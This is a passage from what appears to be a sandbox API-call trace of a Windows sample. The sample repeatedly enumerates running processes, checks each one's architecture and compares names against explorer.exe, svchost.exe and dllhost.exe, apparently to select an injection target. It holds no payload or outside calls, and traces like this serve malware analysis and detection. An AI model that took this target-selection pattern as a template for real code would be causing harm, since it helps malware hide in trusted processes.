dwProcessId=0x644) returned 0xd8 [0216.447] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0216.447] CloseHandle (hObject=0xd8) returned 1 [0216.448] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0216.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0216.448] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0216.448] CloseHandle (hObject=0xd8) returned 1 [0216.448] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0216.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0216.449] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0216.449] CloseHandle (hObject=0xd8) returned 1 [0216.449] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0216.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0216.449] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0216.449] CloseHandle (hObject=0xd8) returned 1 [0216.449] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0216.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0216.450] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0216.450] CloseHandle (hObject=0xd8) returned 1 [0216.450] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0216.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0216.450] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0216.450] CloseHandle (hObject=0xd8) returned 1 [0216.450] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0216.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0216.451] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0216.451] CloseHandle (hObject=0xd8) returned 1 [0216.451] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0216.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0216.452] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0216.452] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0216.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0216.453] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0216.453] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0216.454] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0216.454] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0216.454] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0216.454] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0216.454] CloseHandle (hObject=0xd8) returned 1 [0216.454] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0216.454] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0216.455] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0216.455] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0216.455] CloseHandle (hObject=0xd8) returned 1 [0216.455] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0216.455] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0216.455] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0216.455] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0216.455] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0216.455] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0216.456] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0216.456] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0216.456] CloseHandle (hObject=0xd8) returned 1 [0216.456] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0216.456] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0216.456] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0216.457] CloseHandle (hObject=0xd8) returned 1 [0216.457] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0216.457] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0216.457] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0216.457] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0216.457] CloseHandle (hObject=0xd8) returned 1 [0216.457] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0216.458] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0216.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0216.458] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0216.458] CloseHandle (hObject=0xd8) returned 1 [0216.458] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0216.562] CloseHandle (hObject=0xd4) returned 1 [0216.562] Sleep (dwMilliseconds=0x3e8) [0217.592] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0217.594] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0217.594] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0217.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0217.595] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0217.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0217.595] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0217.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0217.596] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0217.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0217.596] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0217.597] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0217.597] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0217.598] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0217.598] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0217.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0217.599] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0217.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0217.599] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0217.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0217.600] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0217.600] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0217.601] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0217.601] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.602] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0217.602] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.602] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0217.602] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0217.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0217.603] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0217.603] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0217.604] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0217.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0217.604] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0217.604] CloseHandle (hObject=0xd8) returned 1 [0217.604] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0217.605] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0217.605] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0217.605] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0217.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0217.605] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0217.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0217.606] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0217.606] CloseHandle (hObject=0xd8) returned 1 [0217.606] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0217.606] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0217.606] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0217.606] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0217.606] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0217.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0217.607] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0217.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0217.607] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0217.607] CloseHandle (hObject=0xd8) returned 1 [0217.607] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0217.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0217.608] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0217.608] CloseHandle (hObject=0xd8) returned 1 [0217.608] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0217.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0217.608] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0217.608] CloseHandle (hObject=0xd8) returned 1 [0217.609] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0217.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0217.609] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0217.609] CloseHandle (hObject=0xd8) returned 1 [0217.609] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0217.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0217.610] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0217.610] CloseHandle (hObject=0xd8) returned 1 [0217.610] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0217.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0217.610] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0217.610] CloseHandle (hObject=0xd8) returned 1 [0217.610] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0217.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0217.611] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0217.611] CloseHandle (hObject=0xd8) returned 1 [0217.611] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0217.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0217.611] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0217.611] CloseHandle (hObject=0xd8) returned 1 [0217.611] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0217.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0217.612] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0217.612] CloseHandle (hObject=0xd8) returned 1 [0217.612] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0217.613] OpenProcess 